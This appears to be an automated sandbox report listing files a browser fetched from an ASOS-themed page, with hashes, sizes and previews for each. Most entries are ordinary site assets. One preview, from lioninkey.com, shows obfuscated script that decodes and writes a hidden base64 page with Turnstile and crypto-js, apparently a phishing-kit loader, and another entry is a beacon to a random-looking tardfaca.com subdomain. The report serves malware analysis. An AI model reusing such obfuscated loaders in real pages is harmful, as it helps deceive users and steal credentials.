                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):5730
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.244128236209575
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:a/1+YH9jGit5S+ZofBU42YZWGs0W9pp3GqUTCN0gMMVqUTCN0gMMeqUTCN0gMMQ:a9l9zEcLUTCyMoUTCyM1UTCyMQ
                                                                                                                                                                                                                                                                                      MD5:FEFAD1DDF3C888F66E430221294FA111
                                                                                                                                                                                                                                                                                      SHA1:500266193855751FBE2581E48EE570A0AEEFEB8D
                                                                                                                                                                                                                                                                                      SHA-256:9475967B4ED1A722227C1316D6F17795F4363C839A42B4336557528DF89664FE
                                                                                                                                                                                                                                                                                      SHA-512:3645AD63A9770EA9622C361DEB12F3F9ADBD4F5C44879DDFD02CFC06468FBC93D42A432BC0CDFC6DC1367C0FAEEE37EEBCB1A253458AB7FE750F9F1EE9046971
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/asos-ui/manifest/windowManifest.js
                                                                                                                                                                                                                                                                                      Preview:window.__versionManifest = {. useCurrentKeyStoreDataversion: true,. keyStoreDataversion: {. current: 'mhabj1f-41',. previous: '11a1qu9-40'. },. features: {. 'web-event-icon': {},. 'login-interstitial-page': true. },. siteChromeVersion: {. au: {. useCurrent: true,. current: '13',. previous: '12'. },. ru: {. useCurrent: true,. current: '13',. previous: '12'. },. com: {. useCurrent: true,. current: '13',. previous: '12'. },. es: {. useCurrent: true,. current: '13',. previous: '12'. },. it: {. useCurrent: true,. current: '13',. previous: '12'. },. de: {. useCurrent: true,. current: '13',. previous: '12'. },. fr: {. useCurrent: true,. current: '13',. previous: '12'. },. us: {. useCurrent: true,. current: '13',. previous: '12'. },. row: {. useCurrent: true,. current: '13',. previous: '12'.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):89501
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (56943)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):57014
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.378838470596009
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:LfV8BFuXNhsWi6Ns8gMoqpfwTr6TdShTdDggwLYWrxj5+xjH+HAF1riaj14:6ksBEsComf6r6TdShTJggwLYWrxj5+xY
                                                                                                                                                                                                                                                                                      MD5:168008A26F9E32C4FC5449BAABBB8924
                                                                                                                                                                                                                                                                                      SHA1:021F48E00109F931F930042B0CC75732DE23AF16
                                                                                                                                                                                                                                                                                      SHA-256:194B419E7C48A7893691594652358A8F3029B71BC083FCB59DF98811ECEA4994
                                                                                                                                                                                                                                                                                      SHA-512:8CBD7C613D81965C91F0BE2ED9EE689B64864E26C93DDB28E88B060654BA03FE45EA7AC928F8D8ADDCA2146BF975EB45FD345F32AA465F886E628B2A67BB212D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/sitechromepublisher/client.newrelicclient.b259fc7924b4379328f1.js
                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e,t={76140:(e,t,n)=>{var r=n(60141);function i(e,t){!function(e,t){if(t.has(e))throw new TypeError("Cannot initialize the same private elements twice on an object")}(e,t),t.add(e)}function o(e,t,n){if(!t.has(e))throw new TypeError("attempted to get private field on non-instance");return n}function a(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function s(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?a(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):a(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}n(93085),function(e,t){var n,a,c;if(/\.asos\.com$/i.test(e)&&!/local/i.test(e)?n="prod":(/\.asosservices\.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (7157), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):19253
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.890051363229865
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:jbnuDJ/83RLKNFfsajSlWd/dcnuDJ/83RLKNFfsajSlWdWlrolrL:603RLAFfsi46f03RLAFfsi46WlrolrL
                                                                                                                                                                                                                                                                                      MD5:B86C2CB6DD7F092488D3D3E03A22D7F2
                                                                                                                                                                                                                                                                                      SHA1:C7634C7737EAC2D6BC59308A561FC716E8238495
                                                                                                                                                                                                                                                                                      SHA-256:C7E3E4A6F3502E735DB14460D8B4A048BF51FAF2D3943E1B6EEAF417B6D013BB
                                                                                                                                                                                                                                                                                      SHA-512:D22A0D47B76D0C3253D71E80C89FB768C49F474BCA2484B1B92B4CE75360A508CD9946381D7F3B638A3E1D4C5346E497114DAFBEF0AFD645DB87F0DC22A28E5A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://fkmd.lioninkey.com/6ysw/
                                                                                                                                                                                                                                                                                      Preview: The biggest risk is not taking any risk. -->..<script>../* Success is not in what you have, but who you are. */..if(atob("aHR0cHM6Ly9Ga21ELmxpb25pbmtleS5jb20vNnlzdy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm9
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):3584
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.928464857549821
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:9sEXYk+HMSRsIK53q0mKmqekrE9IQaEmOJpOwEHtSVg//+si+MCi8iP0xRdsz6:bYvlsR3ntxrE1aEmOJcHt3//+r9L02z6
                                                                                                                                                                                                                                                                                      MD5:814C967BCFF1E61CBD2FBCA2ABFA73EB
                                                                                                                                                                                                                                                                                      SHA1:F4359D25B4529B960150769BC8B297C1BB115A5C
                                                                                                                                                                                                                                                                                      SHA-256:D964E97D2D522765DAA6EC422A62C547F2B5564C8616C9F4BF3D7AFA08C99BE2
                                                                                                                                                                                                                                                                                      SHA-512:7CE384E45ED885CAAEB9804A17965B77B2F04A333F9DAA6C3FFD3451671AEE47651992674A4220C4315F4EC407986DD124DEA9CD81C652BEDB6651DF2EF3ED58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/storesa/images/flags/us.png
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx..]}l......;..+.....+N...;. .....6.....*....*...R.W.....R9..T...B...$.B.$Rh. ...vc.v..G..?.......n..y.n}9.}..fo..../..y3..<....8o|t.V].Vi~.J..U.i....g*...b.q.p$%...RIiM%..N...r~~....W7.k.....u.M.....7k.w............`.fra..mJ#...R>ZE.%..X ..Q...o1')ko..?....Nn.I...^.T.F...q.).?......i.....||..$?S.x.c....K_.$..9d{.n:w.k2f.(..:g.>.PCjG..|..5.W!......?..x.(.;3~..3..)....g..Q....`'.c9.^ZI.7n.3.2=.q....^....<.9../r....J.9(..#..h...ggw.19.....a...y....7....K.....h.N(.k........7..kc-.:R..N:r.%(..{....{..)..{.?t.......(+.`..3H~!.Hg..,$..{.}H.]m....n.Y...j.....A..i......,....hll....Nzw.oE^$.x.4~..=`.2.....p.ut...y..Oq....my.m......H6{..g..w...R...8\\.....36.6...g..<......v....j..6.........w.\0n..y...o[...ue....L......)..X.W.....0K.;...Rww7....:V.X.....9.....:.C.....O}...7|..A..}.=....}...c.i......v..V.ZE%%%b\f.lhmm..947.6.Z....Q....x.P....z..'X...(....+.-.........|......FGG7....e..`N..7g%.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):19948
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                                      MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                                      SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                                      SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                                                      SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):7076
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.52488676121649
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:bttd4a6O1T6ahNU3dJ+SrM0hjUYIW2WX8ISlY:bBJ1T9UNJ+SrM0lXV2WXXSlY
                                                                                                                                                                                                                                                                                      MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                                                                                                                      SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
                                                                                                                                                                                                                                                                                      SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                                                                                                                      SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fwww.asosglobal.com
                                                                                                                                                                                                                                                                                      Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com/36974546827917592623PukShACTIFUUXHNFZJZLOOOMQZMXHGUSGNHIYBAXZDFLHJUFPX
                                                                                                                                                                                                                                                                                      Preview:1
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5730
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.244128236209575
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:a/1+YH9jGit5S+ZofBU42YZWGs0W9pp3GqUTCN0gMMVqUTCN0gMMeqUTCN0gMMQ:a9l9zEcLUTCyMoUTCyM1UTCyMQ
                                                                                                                                                                                                                                                                                      MD5:FEFAD1DDF3C888F66E430221294FA111
                                                                                                                                                                                                                                                                                      SHA1:500266193855751FBE2581E48EE570A0AEEFEB8D
                                                                                                                                                                                                                                                                                      SHA-256:9475967B4ED1A722227C1316D6F17795F4363C839A42B4336557528DF89664FE
                                                                                                                                                                                                                                                                                      SHA-512:3645AD63A9770EA9622C361DEB12F3F9ADBD4F5C44879DDFD02CFC06468FBC93D42A432BC0CDFC6DC1367C0FAEEE37EEBCB1A253458AB7FE750F9F1EE9046971
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:window.__versionManifest = {. useCurrentKeyStoreDataversion: true,. keyStoreDataversion: {. current: 'mhabj1f-41',. previous: '11a1qu9-40'. },. features: {. 'web-event-icon': {},. 'login-interstitial-page': true. },. siteChromeVersion: {. au: {. useCurrent: true,. current: '13',. previous: '12'. },. ru: {. useCurrent: true,. current: '13',. previous: '12'. },. com: {. useCurrent: true,. current: '13',. previous: '12'. },. es: {. useCurrent: true,. current: '13',. previous: '12'. },. it: {. useCurrent: true,. current: '13',. previous: '12'. },. de: {. useCurrent: true,. current: '13',. previous: '12'. },. fr: {. useCurrent: true,. current: '13',. previous: '12'. },. us: {. useCurrent: true,. current: '13',. previous: '12'. },. row: {. useCurrent: true,. current: '13',. previous: '12'.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):5485
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.331531240557233
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:+OjA9N26MT0D5MdtbZPAVwzV2QvkUaiXBh1S8/2kdMcDR:+OksYNMtKwYQvHd6k6uR
                                                                                                                                                                                                                                                                                      MD5:CCE47E1CA1DF7B1E50E84490634C9C43
                                                                                                                                                                                                                                                                                      SHA1:450DADF1B1F7B6BC5AD27447EB74DE59716F3E01
                                                                                                                                                                                                                                                                                      SHA-256:9015D2D9293931B46E1809860B5B97996EA1236EBEE3498C4BEB01D7FCB27F80
                                                                                                                                                                                                                                                                                      SHA-512:A14EE5913E1B39DCD13185E05970D8730489030CDD5DB3FFEEBD25831B571F252D41B5AF0F8406C5BA135087B272BE9F359C1804ACBEE4AD01826C264855DB9B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://images.asos-media.com/navigation/american-express-png
                                                                                                                                                                                                                                                                                      Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...<....pixi............av1C. .....Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (26334)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):26384
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.362940079689228
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7CgTkWPMgNmomFNpKw612MtT19eYBTyu9Cjrm:rpkBrF/KjV5TpSK
                                                                                                                                                                                                                                                                                      MD5:3667B64516B460AE907CE815618207AB
                                                                                                                                                                                                                                                                                      SHA1:88A4E8491DBCF88BF76486534CAD0BD99192C614
                                                                                                                                                                                                                                                                                      SHA-256:2BDC31421C9AD184399B387B910AF5B7110732E2B3B532FD1EEA1E3ED4CFCF38
                                                                                                                                                                                                                                                                                      SHA-512:456AB64A42760E802405A4BE84215A4C832DFB07ED7EF973B88804479FEBA7815FD23A0BA2398DFC49BCA957A4618FD6BFE462F1A2E2B3CFEED884CB24B85B33
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:this.window=this.window||{},this.window.asos=this.window.asos||{},this.window.asos.webRequest=function(e){"use strict";var t=function(e,t,r){return t in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e};var r=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n};var n=function(e){if(Array.isArray(e))return r(e)};var o=function(e){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(e))return Array.from(e)};var i=function(e,t){if(e){if("string"==typeof e)return r(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?r(e,t):void 0}};var a=function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")};var s=function(e){return n(e)
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5930
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947840790077426
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:npymT40wlsILs2JzRls5aeu1iVp7GHGa6AyEtjjvjfjJjMZZ2p88A:MlRLtJznuBaiVpC6vE1jLbJEKA
                                                                                                                                                                                                                                                                                      MD5:EA15AD8B901863FE058078C8BB5528CF
                                                                                                                                                                                                                                                                                      SHA1:E1C6677574F90480C5AF022D828C9EFA355C5188
                                                                                                                                                                                                                                                                                      SHA-256:A0A6A1E47631A7017527CB8325BD1F284C3A54B877D822E041C4AA49A83A5B0B
                                                                                                                                                                                                                                                                                      SHA-512:7BF0813B357FFDE95B5F2DE459251470175E952C54F3E23CF90A4C06BD53A5143A127951C2D7FF14AAB4A5075B594241760A6CC043BAB8DB5E59315A2FE0FEFE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:{"CookieSPAEnabled":false,"CookieSameSiteNoneEnabled":false,"CookieV2CSPEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"202401.2.0","OptanonDataJSON":"908f7fca-dbc5-4b3a-8f6b-ed734de0cb52","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","BulkDomainCheckUrl":"https://cookies-data.onetrust.io/bannersdk/v1/domaingroupcheck","RuleSet":[{"Id":"018f60e2-bdf7-77a2-ae44-3ef34a582931","Name":"TCF: Reject All","Countries":["de","fi","be","dk","it","gr","fr","hu","es","at","gb","ie","nl"],"States":{},"LanguageSwitcherPlaceholder":{"it-it":"it-it","ru-ru":"ru-ru","pl-pl":"pl-pl","de-de":"de-de","default":"en-gb","nl-nl":"nl-nl","en-us":"en-us","sv-se":"sv-se","es-es":"es-es","en-au":"en-au","da-dk":"da-dk","fr-fr":"fr-fr"},"BannerPushesDown":false,"Default":false,"Global":false,"Type":"IAB2V2","UseGoogleVendors":true,"VariantEnabled":false,"TestEndTime":null,"Variants":[],"
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3810
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.943543789912295
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:OIQMcJ3Snkq1Zx9/1YFKaFA1TapnwrSInCf51SG/:zQdikqPx9aHA1TapnwHnQr5
                                                                                                                                                                                                                                                                                      MD5:B4A4AEEF41EE413911BDF53724431511
                                                                                                                                                                                                                                                                                      SHA1:F84E97D881DD1D90C191103EA1715D5A646D319F
                                                                                                                                                                                                                                                                                      SHA-256:3B672FA58CC2E0A0A21C7AEE6E5D8B9A3CB8BA2C7692BEFB7E69EC29F24B895F
                                                                                                                                                                                                                                                                                      SHA-512:AE1BF7ABC4D1FC615191C2BEEAA63E3CD8DD100666D3BAE99CDA7F6F19AC473B2997C772D2BE0924707030A6269E6EE43284D47F9B2BE3986F99E8F3C3FA765B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
